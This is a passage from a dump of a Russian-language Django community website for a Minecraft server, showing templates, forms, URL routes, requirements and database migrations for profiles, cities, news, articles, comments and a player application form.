%}\n\t\t\t\t\t\t\t\t\t\t<p class=\"role\"> {{ comment.role }} </p>\n\t\t\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t\t\t<p class=\"created\"> {{ comment.created }} </p>\n\t\t\t\t\t\t\t\t\t<div class=\"text\">\n\t\t\t\t\t\t\t\t\t\t<p>{{ comment.body }}</p>\n\t\t\t\t\t\t\t\t\t</div>\n\n\t\t\t\t\t\t\t\t\t{% if request.user.username == comment.name or request.user.username == username or request.user.profile.admin %}\n\t\t\t\t\t\t\t\t\t\t<div class=\"dropdown\">\n\t\t\t\t\t\t\t\t\t\t\t<i class=\"add material-icons\" style=\"font-size: 30px; \">more_vert</i>\n\t\t\t\t\t\t\t\t\t\t\t<div class=\"dropdown-content\">\n\t\t\t\t\t\t\t\t\t\t\t\t<a href=\"{%url 'user_comment_delete' comment_id=comment.pk user_id=user.pk%}\"><i class=\"profile material-icons\" style=\"font-size: 25px; color: #e82323;\">delete</i></a>\n\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t\t\t{% endif %}\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t</div>\n\t\t\t\t\t\t\t{% empty %}\n\t\t\t\t\t\t\t\t<p>Здесь нету ни одного комментария</p>\n\t\t\t\t\t\t\t{% endfor %}\n\t\t\t\t\t\t</div>\n\n\t\t\t\t\t</div>\n\n\t\t\t\t</div>\n\n\t\t\t\n\t\t\t</div>\n\n\t\t\t{% include 'parts_of_page/footer.html' %}\n\n\t\t</div>\n\n\n\n\t</body>\n\n</html>\n\n" }, { "alpha_fraction": 0.539959728717804, "alphanum_fraction": 0.5419744849205017, "avg_line_length": 19.27142906188965, "blob_id": "4db94926336b89258dbc5afdd0dd38165a226f39", "content_id": "02c5db0e4b5ee36225561c88b86b7cc8ab0843d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2978, "license_type": "no_license", "max_line_length": 103, "num_lines": 140, "path": "/blog/forms.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\nfrom django import forms\r\nfrom .models import Profile, News, Article, City, Penetration, NewsComment, UserComment, ArticleComment\r\nfrom django.contrib.auth.models import User\r\n\r\n\r\nclass NewsCommentForm(forms.ModelForm):\r\n class Meta:\r\n model = NewsComment\r\n fields = ('body',)\r\n\r\nclass ArticleCommentForm(forms.ModelForm):\r\n class Meta:\r\n model = ArticleComment\r\n fields = ('body',)\r\n\r\n\r\nclass Add_nuwsForm(forms.ModelForm):\r\n class Meta:\r\n model = News\r\n fields = ('image', 'title', 
'text',)\r\n\r\nclass DeleteNewsForm(forms.ModelForm):\r\n class Meta:\r\n model = News\r\n fields = []\r\n\r\n\r\nclass DeleteArticleForm(forms.ModelForm):\r\n class Meta:\r\n model = Article\r\n fields = []\r\n\r\nclass DeleteCityForm(forms.ModelForm):\r\n class Meta:\r\n model = City\r\n fields = []\r\n\r\nclass EditNewsCommentForm(forms.ModelForm):\r\n class Meta:\r\n model = NewsComment\r\n fields = ('body',)\r\n\r\n\r\nclass DeleteNewsCommentForm(forms.ModelForm):\r\n class Meta:\r\n model = NewsComment\r\n fields = []\r\n\r\n\r\n\r\nclass AddArticleForm(forms.ModelForm):\r\n class Meta:\r\n model = Article\r\n fields = ('image', 'title', 'text',)\r\n\r\n\r\nclass EditArticleCommentForm(forms.ModelForm):\r\n class Meta:\r\n model = ArticleComment\r\n fields = ('body',)\r\n\r\n\r\nclass DeleteArticleCommentForm(forms.ModelForm):\r\n class Meta:\r\n model = ArticleComment\r\n fields = []\r\n\r\n\r\nclass UserCommentForm(forms.ModelForm):\r\n class Meta:\r\n model = UserComment\r\n fields = ('body',)\r\n\r\nclass DeleteUserCommentForm(forms.ModelForm):\r\n class Meta:\r\n model = UserComment\r\n fields = []\r\n\r\n\r\nclass UserForm(forms.ModelForm):\r\n class Meta:\r\n model = User\r\n fields = ('username',)\r\n\r\n\r\n\r\n\r\nclass ProfileForm(forms.ModelForm):\r\n class Meta:\r\n model = Profile\r\n\r\n fields = ('user_image', 'info',)\r\n\r\n\r\nclass ChangeProfileRoleForm(forms.ModelForm):\r\n class Meta:\r\n model = Profile\r\n\r\n fields = ('role',)\r\n\r\n\r\nclass Add_citeForm(forms.ModelForm):\r\n class Meta:\r\n model = City\r\n fields = (\r\n 'image',\r\n 'image1',\r\n 'image2',\r\n 'image3',\r\n 'image4',\r\n 'image5',\r\n 'title',\r\n 'text',\r\n 'smol_text',\r\n 'status',\r\n 'contact_url',\r\n 'mayor'\r\n )\r\n\r\n\r\nclass PenetrationForm(forms.ModelForm):\r\n class Meta:\r\n model = Penetration\r\n fields = (\r\n 'minecraft_nickname',\r\n 'donation_username',\r\n 'free_token',\r\n 'donation_image',\r\n 'description_yourself',\r\n 'how_you_know',\r\n 'contact',\r\n 'status'\r\n )\r\n\r\n\r\nclass EditPenetrationForm(forms.ModelForm):\r\n class Meta:\r\n model = Penetration\r\n fields = ('status',)\r\n" }, { "alpha_fraction": 0.5121951103210449, "alphanum_fraction": 0.5609756112098694, "avg_line_length": 28.81818199157715, "blob_id": "4f09b854aaccc110afd43ec0d7a6aae1ee74caa2", "content_id": "a613869104ee10f0f55a1715c737c845a7a1cc04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 735, "license_type": "no_license", "max_line_length": 212, "num_lines": 22, "path": "/blog/migrations/0033_auto_20210720_2057.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-07-20 17:57\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('blog', '0032_auto_20210720_2050'),\n    ]\n\n    operations = [\n        migrations.RemoveField(\n            model_name='profile',\n            name='favorite_fruit',\n        ),\n        migrations.AlterField(\n            model_name='profile',\n            name='role',\n            field=models.CharField(choices=[('Игрок', 'Игрок'), ('Журналист', 'Журналист'), ('Мэр', 'Мэр'), ('Президент', 'Президент'), ('ФБР', 'ФБР'), ('Глава ФБР', 'Глава ФБР')], default='Игрок', max_length=9),\n        ),\n    ]\n" }, { "alpha_fraction": 0.5152636170387268, "alphanum_fraction": 0.5198889970779419, "avg_line_length": 15.615385055541992, "blob_id": "346e9196314429f3c42f41821df80c908e6274bb", "content_id": "c92b9002f30fb1ff5c684a7d428a9831ce0843", "detected_licenses": [], "is_generated": 
false, "is_vendor": false, "language": "HTML", "length_bytes": 1099, "license_type": "no_license", "max_line_length": 108, "num_lines": 65, "path": "/blog/templates/profile/upgrade_profile_page.html", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "{% load static %}\n\n\n<!DOCTYPE html>\n\n<html>\n\n\t<head>\n\t\t{% include 'parts_of_page/pages_head.html' %}\n\n\t</head>\n\n\n\t<body>\n\n\n\n\t\t<div class=\"wrapper\">\n\n\t\t\t{% include 'parts_of_page/header.html' %}\n\n\t\t\t{% include 'parts_of_page/news.html' %}\n\n\t\t\t<div class=\"content\">\n\t\t\t\t<div class=\"profile\">\n\t\t\t\t\t<form method=\"POST\" enctype=\"multipart/form-data\" class=\"register_and_login\" style=\"margin-top: 10px\">\n\t\t\t\t\t\t{% csrf_token %}\n\t\t\t\t\t\t<div class=\"image_div\">\n\t\t\t\t\t\t\t<img src=\"{{user_image}}\" width=\"100%\">\n\t\t\t\t\t\t</div>\n\t\t\t\t\t\t<div class=\"add_image\">\n\t\t\t\t\t\t\t{{ profile_form.user_image }}\n\t\t\t\t\t\t</div>\n\n\t\t\t\t\t\t<div class=\"change_username\">\n\t\t\t\t\t\t\t{{ user_form.as_p }}\n\t\t\t\t\t\t</div>\n\n\t\t\t\t\t\t<div class=\"change_info\">\n\t\t\t\t\t\t\t{{ profile_form.info }}\n\t\t\t\t\t\t</div>\n\n\t\t\t\t\t\t\n\n\t\t\t\t\t\t<div class=\"errors\">\t\n\t\t\t\t\t\t\t{% for err in error %}\n\t\t\t\t\t\t\t\t<p>{{err}}</p>\n\t\t\t\t\t\t\t{% endfor %}\n\t\t\t\t\t\t</div>\n\t\t\t\t\t\t<button type=\"submit\" class=\"button\" style=\"float: right;\">Сохранить изменения</button>\n\t\t\t\t\t</form>\n\t\t\t\t</div>\n\n\t\t\t\n\t\t\t</div>\n\n\t\t\t{% include 'parts_of_page/footer.html' %}\n\n\t\t</div>\n\n\n\n\t</body>\n\n</html>\n\n" }, { "alpha_fraction": 0.4957118332386017, "alphanum_fraction": 0.5385934710502625, "avg_line_length": 23.34782600402832, "blob_id": "bffc6619c7f8706bc14a773f04c36293abbe940e", "content_id": "39e455f0a0473141d9dfbb7d0b2d0680ebd16148", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 588, "license_type": "no_license", "max_line_length": 68, "num_lines": 23, "path": "/blog/migrations/0024_auto_20210622_2014.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-22 17:14\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0023_comment'),\r\n ]\r\n\r\n operations = [\r\n migrations.AddField(\r\n model_name='comment',\r\n name='image',\r\n field=models.CharField(default='none', max_length=300),\r\n ),\r\n migrations.AddField(\r\n model_name='comment',\r\n name='user_role',\r\n field=models.CharField(default='Игрок', max_length=100),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.53794264793396, "alphanum_fraction": 0.5919055938720703, "avg_line_length": 31.94444465637207, "blob_id": "93d2399e78f9fc324eb16c39e393930580c5e37d", "content_id": "e8e9cc60ec65f0913a1f35731f626e38c427be7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 667, "license_type": "no_license", "max_line_length": 261, "num_lines": 18, "path": "/blog/migrations/0034_alter_profile_role.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-07-20 18:15\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0033_auto_20210720_2057'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='profile',\n name='role',\n 
field=models.CharField(choices=[('Игрок', 'Игрок'), ('Журналист', 'Журналист'), ('Мэр', 'Мэр'), ('Президент', 'Президент'), ('ФБР', 'ФБР'), ('Глава ФБР', 'Глава ФБР')], default=None, max_length=9, null=True, verbose_name='Do you own a Smartphone?'),\n ),\n ]\n" }, { "alpha_fraction": 0.5258620977401733, "alphanum_fraction": 0.5926724076271057, "avg_line_length": 23.77777862548828, "blob_id": "8f8f716301dbb246bc524fe909be2445dadceb21", "content_id": "9e17abe76640468470ee4f4d930d1b496b506eb8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 523, "license_type": "no_license", "max_line_length": 116, "num_lines": 18, "path": "/blog/migrations/0008_profile_info.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-18 13:57\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0007_auto_20210618_1239'),\r\n ]\r\n\r\n operations = [\r\n migrations.AddField(\r\n model_name='profile',\r\n name='info',\r\n field=models.TextField(default='Проходивший мимо пользователь сайта, который ничего о себе не написал'),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.4914425313472748, "alphanum_fraction": 0.567237138748169, "avg_line_length": 20.72222137451172, "blob_id": "62d6b2c41db54adc21f7c4accd4150f126c9b8f0", "content_id": "5b7a340e56d55f941d9a0010949236a1e8e45733", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 409, "license_type": "no_license", "max_line_length": 53, "num_lines": 18, "path": "/blog/migrations/0022_alter_profile_registered.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-22 13:23\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0021_auto_20210622_1616'),\r\n ]\r\n\r\n operations = [\r\n migrations.AlterField(\r\n model_name='profile',\r\n name='registered',\r\n field=models.BooleanField(default=False),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.5321518778800964, "alphanum_fraction": 0.5584810376167297, "avg_line_length": 40.14583206176758, "blob_id": "cca82b6bc8dc3c6451a1625c23d39027824ee836", "content_id": "91621cd5eb573fae79fd158d85a87612cf9cf27f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1980, "license_type": "no_license", "max_line_length": 136, "num_lines": 48, "path": "/blog/migrations/0030_auto_20210719_1639.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-07-19 13:39\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0029_auto_20210719_1524'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Article',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('image', models.ImageField(upload_to='article/image/')),\n ('title', models.CharField(max_length=1000)),\n ('text', models.TextField()),\n ('create_date', models.DateTimeField(default=django.utils.timezone.now)),\n ('active', models.BooleanField(default=True)),\n ('author', models.CharField(default='ananist', max_length=100)),\n ],\n ),\n migrations.RenameModel(\n old_name='Comment',\n 
new_name='NewsComment',\n ),\n migrations.CreateModel(\n name='ArticleComment',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('image', models.CharField(default='none', max_length=300)),\n ('name', models.CharField(max_length=100)),\n ('userid', models.CharField(default=3, max_length=1000)),\n ('role', models.CharField(default='Игрок', max_length=100)),\n ('body', models.TextField()),\n ('created', models.DateTimeField(default=django.utils.timezone.now)),\n ('active', models.BooleanField(default=True)),\n ('article', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='blog.article')),\n ],\n options={\n 'ordering': ('created',),\n },\n ),\n ]\n" }, { "alpha_fraction": 0.528363049030304, "alphanum_fraction": 0.5429497361183167, "avg_line_length": 32.924530029296875, "blob_id": "4ff56ca1da3d54fd6ea342e840666a78d218a210", "content_id": "b65514a0605b26a526e222742b017d1a079d634e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1851, "license_type": "no_license", "max_line_length": 115, "num_lines": 53, "path": "/blog/migrations/0017_auto_20210621_2136.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-21 18:36\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0016_city_mayor'),\r\n ]\r\n\r\n operations = [\r\n migrations.AddField(\r\n model_name='city',\r\n name='image1',\r\n field=models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/'),\r\n ),\r\n migrations.AddField(\r\n model_name='city',\r\n name='image2',\r\n field=models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/'),\r\n ),\r\n migrations.AddField(\r\n model_name='city',\r\n name='image3',\r\n field=models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/'),\r\n ),\r\n migrations.AddField(\r\n model_name='city',\r\n name='image4',\r\n field=models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/'),\r\n ),\r\n migrations.AddField(\r\n model_name='city',\r\n name='image5',\r\n field=models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/'),\r\n ),\r\n migrations.AlterField(\r\n model_name='city',\r\n name='image',\r\n field=models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/'),\r\n ),\r\n migrations.AlterField(\r\n model_name='city',\r\n name='smol_text',\r\n field=models.TextField(max_length=400),\r\n ),\r\n migrations.AlterField(\r\n model_name='city',\r\n name='text',\r\n field=models.TextField(),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.8936170339584351, "alphanum_fraction": 0.8936170339584351, "avg_line_length": 10.75, "blob_id": "72ad2e7655146b20e2787fa1a8204312e0ff6ed7", "content_id": "98094a5fc107c8991c532cf7b6c16f487d1bb016", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 47, "license_type": "no_license", "max_line_length": 23, "num_lines": 4, "path": "/requirements.txt", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "django\nrequests\nPillow\ndjango-multiselectfield\n" }, { "alpha_fraction": 0.47843137383461, "alphanum_fraction": 0.5156862735748291, "avg_line_length": 21.18181800842285, 
"blob_id": "055277065b42b303c0ba7cde17ead483035109c3", "content_id": "aadfa7dada4c9c3459057dda38bd5ca164ad3bf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 510, "license_type": "no_license", "max_line_length": 58, "num_lines": 22, "path": "/blog/migrations/0004_auto_20210617_2123.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-17 18:23\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0003_users'),\r\n ]\r\n\r\n operations = [\r\n migrations.AlterModelOptions(\r\n name='users',\r\n options={'ordering': ('create_date', 'role')},\r\n ),\r\n migrations.AlterField(\r\n model_name='users',\r\n name='role',\r\n field=models.TextField(),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.5854838490486145, "alphanum_fraction": 0.6193548440933228, "avg_line_length": 31.63157844543457, "blob_id": "f8c3cb356339f43cf67149cf373ca21d287da624", "content_id": "aeab3b831641f47a28b7d0c29e0cb59d0ff601f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 719, "license_type": "no_license", "max_line_length": 262, "num_lines": 19, "path": "/blog/migrations/0036_alter_profile_role.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-07-22 06:53\n\nfrom django.db import migrations\nimport multiselectfield.db.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0035_alter_profile_role'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='profile',\n name='role',\n field=multiselectfield.db.fields.MultiSelectField(choices=[('Игрок', 'Игрок'), ('Журналист', 'Журналист'), ('Мэр', 'Мэр'), ('Представитель города', 'Представитель города'), ('ФБР', 'ФБР'), ('Глава ФБР', 'Глава ФБР')], default='Игрок', max_length=54),\n ),\n ]\n" }, { "alpha_fraction": 0.5846200585365295, "alphanum_fraction": 0.5846200585365295, "avg_line_length": 45.869564056396484, "blob_id": "de3bd1d81bc4f1710b2be7479077604033f65042", "content_id": "7ff69e7b5b0d1460996271f98eae47325281f7cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3303, "license_type": "no_license", "max_line_length": 138, "num_lines": 69, "path": "/blog/urls.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "from django.contrib import admin\r\nfrom django.urls import path, re_path\r\nfrom . 
import views\r\n\r\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\r\nfrom django.conf.urls.static import static\r\nfrom django.conf import settings\r\n\r\n\r\n\r\nurlpatterns = [\r\n path('',views.show_main),\r\n path('main/',views.show_main),\r\n path('map/',views.show_map),\r\n path('info/',views.show_info),\r\n path('register/', views.register),\r\n path('logout/', views.logout_user, name='logout'),\r\n path('login/', views.login_user, name='login'),\r\n path('all_profile/', views.all_profile),\r\n\r\n path('profile/', views.profile),\r\n path('profile/<int:user_id>/', views.another_profile, name='another_profile'),\r\n path('profile/delete/user_comment/<int:user_id>/<int:comment_id>',views.delete_user_comment, name='user_comment_delete'),\r\n path('profile/upgrade/', views.upgrade_profile),\r\n\r\n\r\n path('news/<int:news_id>/',views.show_one_news, name='one_news'),\r\n path('news/add/', views.add_news),\r\n path('news/edit/<int:news_id>/', views.edit_news, name='edit_one_news'),\r\n path('news/delete/<int:news_id>/',views.delete_news, name='news_delete'),\r\n path('news/delete/comment/<int:news_id>/<int:comment_id>',views.delete_news_comment, name='news_comment_delete'),\r\n path('news/edit/comment/<int:news_id>/<int:comment_id>',views.edit_news_comment, name='news_comment_edit'),\r\n re_path(r'^news*',views.show_news),\r\n\r\n \r\n path('city/<int:city_id>/',views.show_one_city, name='one_city'),\r\n path('city/add/', views.add_city),\r\n path('city/edit/<int:city_id>/', views.edit_city, name='edit_one_city'),\r\n path('city/delete/<int:city_id>/',views.delete_city, name='city_delete'),\r\n re_path(r'^cities*',views.show_cities),\r\n\r\n \r\n \r\n path('form/add/', views.add_form),\r\n path('form/edit/<int:form_id>/', views.edit_form, name='edit_one_form'),\r\n path('form/<int:form_id>/',views.show_one_form, name='one_form'),\r\n re_path(r'^forms*',views.show_forms),\r\n\r\n \r\n path('article/add/', views.add_article),\r\n path('article/edit/<int:article_id>/', views.edit_article, name='edit_one_article'),\r\n path('article/<int:article_id>/',views.show_one_article, name='one_article'),\r\n path('article/delete/<int:article_id>/',views.delete_article, name='article_delete'),\r\n path('article/delete/comment/<int:article_id>/<int:comment_id>',views.delete_article_comment, name='article_comment_delete'),\r\n path('article/edit/comment/<int:article_id>/<int:comment_id>',views.edit_article_comment, name='article_comment_edit'),\r\n re_path(r'^articles*',views.show_articles),\r\n\r\n\r\n path('change_theme/<str:theme_name>', views.change_theme, name='change_theme'),\r\n\r\n path('api/', views.api, name=\"api\"),\r\n path('discord/', views.discord, name=\"discord\"),\r\n \r\n]\r\n\r\n\r\n\r\nif settings.DEBUG:\r\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\r\n" }, { "alpha_fraction": 0.5735785961151123, "alphanum_fraction": 0.6086956262588501, "avg_line_length": 30.473684310913086, "blob_id": "31b2c4c7fa89cc5ce8da3c7d2447e92064018769", "content_id": "6f08fa4cf52e13401c124c8c7c2827dd96b1f07b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 677, "license_type": "no_license", "max_line_length": 240, "num_lines": 19, "path": "/blog/migrations/0035_alter_profile_role.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-07-20 19:08\n\nfrom django.db import migrations\nimport multiselectfield.db.fields\n\n\nclass 
Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0034_alter_profile_role'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='profile',\n name='role',\n field=multiselectfield.db.fields.MultiSelectField(choices=[('Игрок', 'Игрок'), ('Журналист', 'Журналист'), ('Мэр', 'Мэр'), ('Президент', 'Президент'), ('ФБР', 'ФБР'), ('Глава ФБР', 'Глава ФБР')], default='Игрок', max_length=43),\n ),\n ]\n" }, { "alpha_fraction": 0.5651785731315613, "alphanum_fraction": 0.5928571224212646, "avg_line_length": 34.129032135009766, "blob_id": "afb6dbcb3a385e49cff77eea36cc17382969afdc", "content_id": "2a51bdbee357141e0246cfe3900d50a17762e1c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1120, "license_type": "no_license", "max_line_length": 121, "num_lines": 31, "path": "/blog/migrations/0006_auto_20210617_2242.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-17 19:42\r\n\r\nfrom django.conf import settings\r\nfrom django.db import migrations, models\r\nimport django.db.models.deletion\r\nimport django.utils.timezone\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\r\n ('blog', '0005_auto_20210617_2127'),\r\n ]\r\n\r\n operations = [\r\n migrations.CreateModel(\r\n name='Profile',\r\n fields=[\r\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\r\n ('user_image', models.ImageField(upload_to='users/user_image/')),\r\n ('create_date', models.DateTimeField(default=django.utils.timezone.now)),\r\n ('role', models.TextField()),\r\n ('admin', models.BooleanField(default=False)),\r\n ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\r\n ],\r\n ),\r\n migrations.DeleteModel(\r\n name='Users',\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.4939759075641632, "alphanum_fraction": 0.5438898205757141, "avg_line_length": 23.2608699798584, "blob_id": "ec53f2a2ef6786f164d8ecc2da340ea376230db4", "content_id": "bc38808bb7d72c1931386614c3180543a2024d4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 581, "license_type": "no_license", "max_line_length": 63, "num_lines": 23, "path": "/blog/migrations/0027_auto_20210623_1040.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-23 07:40\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0026_usercomment'),\r\n ]\r\n\r\n operations = [\r\n migrations.AddField(\r\n model_name='comment',\r\n name='user_id',\r\n field=models.CharField(default=2, max_length=1000),\r\n ),\r\n migrations.AddField(\r\n model_name='usercomment',\r\n name='userid',\r\n field=models.CharField(default=2, max_length=1000),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.4552631676197052, "alphanum_fraction": 0.5368421077728271, "avg_line_length": 19.11111068725586, "blob_id": "6021a888dd85ce83bfe3eb744e383c516337d5f5", "content_id": "fa21027ef7f2903ec19ba952516bb9587570e89e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 380, "license_type": "no_license", "max_line_length": 47, "num_lines": 18, "path": "/blog/migrations/0025_rename_user_role_comment_role.py", "repo_name": "Kikono1014/Marupik_site", 
"src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-22 17:27\r\n\r\nfrom django.db import migrations\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0024_auto_20210622_2014'),\r\n ]\r\n\r\n operations = [\r\n migrations.RenameField(\r\n model_name='comment',\r\n old_name='user_role',\r\n new_name='role',\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.5593952536582947, "alphanum_fraction": 0.6004319787025452, "avg_line_length": 22.36842155456543, "blob_id": "9d4ba813eac17563f4909eaa1615578c81f77664", "content_id": "b2e2efc90e5130f1131feaaa7bef7a814e3dccb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 463, "license_type": "no_license", "max_line_length": 74, "num_lines": 19, "path": "/blog/migrations/0020_penetration_create_date.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-22 09:34\r\n\r\nfrom django.db import migrations, models\r\nimport django.utils.timezone\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0019_penetration_status'),\r\n ]\r\n\r\n operations = [\r\n migrations.AddField(\r\n model_name='penetration',\r\n name='create_date',\r\n field=models.DateTimeField(default=django.utils.timezone.now),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.5420819520950317, "alphanum_fraction": 0.5708748698234558, "avg_line_length": 41, "blob_id": "4aed1b82e305cc8c8b0e0db60eb03237c1c6b7e4", "content_id": "36472a221032feea6529103184f719c4618f8c59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1926, "license_type": "no_license", "max_line_length": 147, "num_lines": 42, "path": "/blog/migrations/0018_auto_20210622_1133.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-22 08:33\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0017_auto_20210621_2136'),\r\n ]\r\n\r\n operations = [\r\n migrations.CreateModel(\r\n name='Penetration',\r\n fields=[\r\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\r\n ('minecraft_nickname', models.CharField(default='Не указано', max_length=100)),\r\n ('site_username', models.CharField(default='Не указано', max_length=100)),\r\n ('donation_username', models.CharField(default='Не указано', max_length=100)),\r\n ('free_token', models.CharField(default='Не указано', max_length=300)),\r\n ('donation_image', models.ImageField(blank=True, default='penetration/image/default/default.png', upload_to='penetration/image/')),\r\n ('description_yourself', models.TextField(default='Не описано.')),\r\n ('how_you_know', models.TextField(default='Не описано.', max_length=400)),\r\n ('contact', models.CharField(max_length=200)),\r\n ],\r\n ),\r\n migrations.AddField(\r\n model_name='profile',\r\n name='registered',\r\n field=models.BooleanField(default=False),\r\n ),\r\n migrations.AlterField(\r\n model_name='city',\r\n name='smol_text',\r\n field=models.TextField(default='Информация от мэра города не поступила.', max_length=400),\r\n ),\r\n migrations.AlterField(\r\n model_name='city',\r\n name='text',\r\n field=models.TextField(default='Информация от мэра города не поступила.'),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.5198675394058228, "alphanum_fraction": 0.5529801249504089, 
